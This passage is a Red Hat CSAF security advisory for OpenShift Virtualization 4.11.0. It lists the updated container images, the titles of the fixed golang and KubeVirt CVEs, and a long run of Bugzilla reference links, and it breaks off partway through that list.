"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working"
}
]
}
rhsa-2022_6526
Vulnerability from csaf_redhat
Published
2022-09-14 19:28
Modified
2024-11-25 13:35
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.11.0 images:
RHEL-8-CNV-4.11
===============
hostpath-provisioner-container-v4.11.0-21
kubevirt-tekton-tasks-operator-container-v4.11.0-29
kubevirt-template-validator-container-v4.11.0-17
bridge-marker-container-v4.11.0-26
hostpath-csi-driver-container-v4.11.0-21
cluster-network-addons-operator-container-v4.11.0-26
ovs-cni-marker-container-v4.11.0-26
virtio-win-container-v4.11.0-16
ovs-cni-plugin-container-v4.11.0-26
kubemacpool-container-v4.11.0-26
hostpath-provisioner-operator-container-v4.11.0-24
cnv-containernetworking-plugins-container-v4.11.0-26
kubevirt-ssp-operator-container-v4.11.0-54
virt-cdi-uploadserver-container-v4.11.0-59
virt-cdi-cloner-container-v4.11.0-59
virt-cdi-operator-container-v4.11.0-59
virt-cdi-importer-container-v4.11.0-59
virt-cdi-uploadproxy-container-v4.11.0-59
virt-cdi-controller-container-v4.11.0-59
virt-cdi-apiserver-container-v4.11.0-59
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7
kubevirt-tekton-tasks-copy-template-container-v4.11.0-7
checkup-framework-container-v4.11.0-67
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7
vm-network-latency-checkup-container-v4.11.0-67
kubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7
hyperconverged-cluster-webhook-container-v4.11.0-95
cnv-must-gather-container-v4.11.0-62
hyperconverged-cluster-operator-container-v4.11.0-95
kubevirt-console-plugin-container-v4.11.0-83
virt-controller-container-v4.11.0-105
virt-handler-container-v4.11.0-105
virt-operator-container-v4.11.0-105
virt-launcher-container-v4.11.0-105
virt-artifacts-server-container-v4.11.0-105
virt-api-container-v4.11.0-105
libguestfs-tools-container-v4.11.0-105
hco-bundle-registry-container-v4.11.0-587
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)
* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.11.0 images:\n\nRHEL-8-CNV-4.11\n===============\nhostpath-provisioner-container-v4.11.0-21\nkubevirt-tekton-tasks-operator-container-v4.11.0-29\nkubevirt-template-validator-container-v4.11.0-17\nbridge-marker-container-v4.11.0-26\nhostpath-csi-driver-container-v4.11.0-21\ncluster-network-addons-operator-container-v4.11.0-26\novs-cni-marker-container-v4.11.0-26\nvirtio-win-container-v4.11.0-16\novs-cni-plugin-container-v4.11.0-26\nkubemacpool-container-v4.11.0-26\nhostpath-provisioner-operator-container-v4.11.0-24\ncnv-containernetworking-plugins-container-v4.11.0-26\nkubevirt-ssp-operator-container-v4.11.0-54\nvirt-cdi-uploadserver-container-v4.11.0-59\nvirt-cdi-cloner-container-v4.11.0-59\nvirt-cdi-operator-container-v4.11.0-59\nvirt-cdi-importer-container-v4.11.0-59\nvirt-cdi-uploadproxy-container-v4.11.0-59\nvirt-cdi-controller-container-v4.11.0-59\nvirt-cdi-apiserver-container-v4.11.0-59\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.0-7\ncheckup-framework-container-v4.11.0-67\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7\nvm-network-latency-checkup-container-v4.11.0-67\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7\nhyperconverged-cluster-webhook-container-v4.11.0-95\ncnv-must-gather-container-v4.11.0-62\nhyperconverged-cluster-operator-container-v4.11.0-95\nkubevirt-console-plugin-container-v4.11.0-83\nvirt-controller-container-v4.11.0-105\nvirt-handler-container-v4.11.0-105\nvirt-operator-container-v4.11.0-105\nvirt-launcher-container-v4.11.0-105\nvirt-artifacts-server-container-v4.11.0-105\nvirt-api-container-v4.11.0-105\nlibguestfs-tools-container-v4.11.0-105\nhco-bundle-registry-container-v4.11.0-587\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:6526",
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "1937609",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937609"
},
{
"category": "external",
"summary": "1945593",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945593"
},
{
"category": "external",
"summary": "1968514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968514"
},
{
"category": "external",
"summary": "1993109",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993109"
},
{
"category": "external",
"summary": "1994604",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1994604"
},
{
"category": "external",
"summary": "2001385",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2001385"
},
{
"category": "external",
"summary": "2009793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2009793"
},
{
"category": "external",
"summary": "2010318",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010318"
},
{
"category": "external",
"summary": "2025276",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025276"
},
{
"category": "external",
"summary": "2025401",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025401"
},
{
"category": "external",
"summary": "2026357",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2026357"
},
{
"category": "external",
"summary": "2029349",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2029349"
},
{
"category": "external",
"summary": "2030801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801"
},
{
"category": "external",
"summary": "2030806",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806"
},
{
"category": "external",
"summary": "2031857",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031857"
},
{
"category": "external",
"summary": "2033077",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033077"
},
{
"category": "external",
"summary": "2035344",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035344"
},
{
"category": "external",
"summary": "2036676",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2036676"
},
{
"category": "external",
"summary": "2039976",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2039976"
},
{
"category": "external",
"summary": "2040766",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2040766"
},
{
"category": "external",
"summary": "2041467",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041467"
},
{
"category": "external",
"summary": "2042402",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2042402"
},
{
"category": "external",
"summary": "2042809",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2042809"
},
{
"category": "external",
"summary": "2045086",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045086"
},
{
"category": "external",
"summary": "2045880",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880"
},
{
"category": "external",
"summary": "2047186",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047186"
},
{
"category": "external",
"summary": "2051899",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2051899"
},
{
"category": "external",
"summary": "2052094",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052094"
},
{
"category": "external",
"summary": "2052466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052466"
},
{
"category": "external",
"summary": "2052689",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052689"
},
{
"category": "external",
"summary": "2053429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429"
},
{
"category": "external",
"summary": "2053532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532"
},
{
"category": "external",
"summary": "2053541",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541"
},
{
"category": "external",
"summary": "2056467",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2056467"
},
{
"category": "external",
"summary": "2057157",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2057157"
},
{
"category": "external",
"summary": "2057310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2057310"
},
{
"category": "external",
"summary": "2058149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2058149"
},
{
"category": "external",
"summary": "2058925",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2058925"
},
{
"category": "external",
"summary": "2059121",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2059121"
},
{
"category": "external",
"summary": "2060485",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060485"
},
{
"category": "external",
"summary": "2060585",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060585"
},
{
"category": "external",
"summary": "2061208",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2061208"
},
{
"category": "external",
"summary": "2061723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2061723"
},
{
"category": "external",
"summary": "2063540",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2063540"
},
{
"category": "external",
"summary": "2063792",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2063792"
},
{
"category": "external",
"summary": "2064034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064034"
},
{
"category": "external",
"summary": "2064702",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064702"
},
{
"category": "external",
"summary": "2064857",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064857"
},
{
"category": "external",
"summary": "2064936",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064936"
},
{
"category": "external",
"summary": "2065014",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2065014"
},
{
"category": "external",
"summary": "2065019",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2065019"
},
{
"category": "external",
"summary": "2066768",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2066768"
},
{
"category": "external",
"summary": "2067246",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067246"
},
{
"category": "external",
"summary": "2069287",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069287"
},
{
"category": "external",
"summary": "2069388",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069388"
},
{
"category": "external",
"summary": "2070366",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366"
},
{
"category": "external",
"summary": "2070864",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070864"
},
{
"category": "external",
"summary": "2071488",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071488"
},
{
"category": "external",
"summary": "2071549",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071549"
},
{
"category": "external",
"summary": "2071611",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071611"
},
{
"category": "external",
"summary": "2071921",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071921"
},
{
"category": "external",
"summary": "2073669",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073669"
},
{
"category": "external",
"summary": "2073679",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073679"
},
{
"category": "external",
"summary": "2073982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073982"
},
{
"category": "external",
"summary": "2074337",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2074337"
},
{
"category": "external",
"summary": "2075200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2075200"
},
{
"category": "external",
"summary": "2075409",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2075409"
},
{
"category": "external",
"summary": "2076292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076292"
},
{
"category": "external",
"summary": "2076379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076379"
},
{
"category": "external",
"summary": "2076790",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076790"
},
{
"category": "external",
"summary": "2076908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2076908"
},
{
"category": "external",
"summary": "2077688",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077688"
},
{
"category": "external",
"summary": "2077689",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077689"
},
{
"category": "external",
"summary": "2078700",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078700"
},
{
"category": "external",
"summary": "2078703",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078703"
},
{
"category": "external",
"summary": "2078709",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078709"
},
{
"category": "external",
"summary": "2078728",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078728"
},
{
"category": "external",
"summary": "2079366",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079366"
},
{
"category": "external",
"summary": "2079674",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079674"
},
{
"category": "external",
"summary": "2079783",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079783"
},
{
"category": "external",
"summary": "2080132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080132"
},
{
"category": "external",
"summary": "2080155",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080155"
},
{
"category": "external",
"summary": "2080547",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080547"
},
{
"category": "external",
"summary": "2080833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080833"
},
{
"category": "external",
"summary": "2080835",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2080835"
},
{
"category": "external",
"summary": "2081182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081182"
},
{
"category": "external",
"summary": "2081202",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081202"
},
{
"category": "external",
"summary": "2081409",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081409"
},
{
"category": "external",
"summary": "2081671",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081671"
},
{
"category": "external",
"summary": "2081831",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2081831"
},
{
"category": "external",
"summary": "2082008",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082008"
},
{
"category": "external",
"summary": "2082164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082164"
},
{
"category": "external",
"summary": "2082912",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2082912"
},
{
"category": "external",
"summary": "2083093",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083093"
},
{
"category": "external",
"summary": "2083097",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083097"
},
{
"category": "external",
"summary": "2083100",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083100"
},
{
"category": "external",
"summary": "2083101",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083101"
},
{
"category": "external",
"summary": "2083135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083135"
},
{
"category": "external",
"summary": "2083256",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083256"
},
{
"category": "external",
"summary": "2083595",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083595"
},
{
"category": "external",
"summary": "2084102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084102"
},
{
"category": "external",
"summary": "2084122",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084122"
},
{
"category": "external",
"summary": "2084418",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084418"
},
{
"category": "external",
"summary": "2084431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084431"
},
{
"category": "external",
"summary": "2084476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084476"
},
{
"category": "external",
"summary": "2084532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084532"
},
{
"category": "external",
"summary": "2084610",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084610"
},
{
"category": "external",
"summary": "2085320",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2085320"
},
{
"category": "external",
"summary": "2085322",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2085322"
},
{
"category": "external",
"summary": "2086272",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086272"
},
{
"category": "external",
"summary": "2086278",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086278"
},
{
"category": "external",
"summary": "2086281",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086281"
},
{
"category": "external",
"summary": "2086286",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086286"
},
{
"category": "external",
"summary": "2086293",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086293"
},
{
"category": "external",
"summary": "2086294",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086294"
},
{
"category": "external",
"summary": "2086303",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086303"
},
{
"category": "external",
"summary": "2086479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086479"
},
{
"category": "external",
"summary": "2086486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086486"
},
{
"category": "external",
"summary": "2086488",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086488"
},
{
"category": "external",
"summary": "2086769",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086769"
},
{
"category": "external",
"summary": "2086803",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086803"
},
{
"category": "external",
"summary": "2086825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086825"
},
{
"category": "external",
"summary": "2086849",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086849"
},
{
"category": "external",
"summary": "2087188",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087188"
},
{
"category": "external",
"summary": "2087189",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087189"
},
{
"category": "external",
"summary": "2087232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087232"
},
{
"category": "external",
"summary": "2087546",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087546"
},
{
"category": "external",
"summary": "2087547",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087547"
},
{
"category": "external",
"summary": "2087559",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087559"
},
{
"category": "external",
"summary": "2087566",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087566"
},
{
"category": "external",
"summary": "2087570",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087570"
},
{
"category": "external",
"summary": "2087577",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087577"
},
{
"category": "external",
"summary": "2087578",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087578"
},
{
"category": "external",
"summary": "2087582",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087582"
},
{
"category": "external",
"summary": "2087583",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087583"
},
{
"category": "external",
"summary": "2087584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087584"
},
{
"category": "external",
"summary": "2087587",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087587"
},
{
"category": "external",
"summary": "2087589",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087589"
},
{
"category": "external",
"summary": "2087590",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087590"
},
{
"category": "external",
"summary": "2087593",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087593"
},
{
"category": "external",
"summary": "2087603",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087603"
},
{
"category": "external",
"summary": "2087616",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087616"
},
{
"category": "external",
"summary": "2087701",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087701"
},
{
"category": "external",
"summary": "2087717",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087717"
},
{
"category": "external",
"summary": "2088034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088034"
},
{
"category": "external",
"summary": "2088355",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088355"
},
{
"category": "external",
"summary": "2088361",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088361"
},
{
"category": "external",
"summary": "2088379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088379"
},
{
"category": "external",
"summary": "2088407",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088407"
},
{
"category": "external",
"summary": "2088471",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088471"
},
{
"category": "external",
"summary": "2088472",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088472"
},
{
"category": "external",
"summary": "2088477",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088477"
},
{
"category": "external",
"summary": "2088849",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088849"
},
{
"category": "external",
"summary": "2089078",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089078"
},
{
"category": "external",
"summary": "2089271",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089271"
},
{
"category": "external",
"summary": "2089327",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089327"
},
{
"category": "external",
"summary": "2089376",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089376"
},
{
"category": "external",
"summary": "2089477",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089477"
},
{
"category": "external",
"summary": "2089700",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089700"
},
{
"category": "external",
"summary": "2089745",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089745"
},
{
"category": "external",
"summary": "2089789",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089789"
},
{
"category": "external",
"summary": "2089825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089825"
},
{
"category": "external",
"summary": "2089836",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089836"
},
{
"category": "external",
"summary": "2089840",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089840"
},
{
"category": "external",
"summary": "2089877",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089877"
},
{
"category": "external",
"summary": "2089932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089932"
},
{
"category": "external",
"summary": "2089942",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089942"
},
{
"category": "external",
"summary": "2089954",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089954"
},
{
"category": "external",
"summary": "2089963",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089963"
},
{
"category": "external",
"summary": "2089967",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089967"
},
{
"category": "external",
"summary": "2089970",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089970"
},
{
"category": "external",
"summary": "2089972",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089972"
},
{
"category": "external",
"summary": "2089979",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089979"
},
{
"category": "external",
"summary": "2089982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089982"
},
{
"category": "external",
"summary": "2090035",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090035"
},
{
"category": "external",
"summary": "2090036",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090036"
},
{
"category": "external",
"summary": "2090037",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090037"
},
{
"category": "external",
"summary": "2090038",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090038"
},
{
"category": "external",
"summary": "2090042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090042"
},
{
"category": "external",
"summary": "2090043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090043"
},
{
"category": "external",
"summary": "2090046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090046"
},
{
"category": "external",
"summary": "2090048",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090048"
},
{
"category": "external",
"summary": "2090054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090054"
},
{
"category": "external",
"summary": "2090055",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090055"
},
{
"category": "external",
"summary": "2090056",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090056"
},
{
"category": "external",
"summary": "2090057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090057"
},
{
"category": "external",
"summary": "2090059",
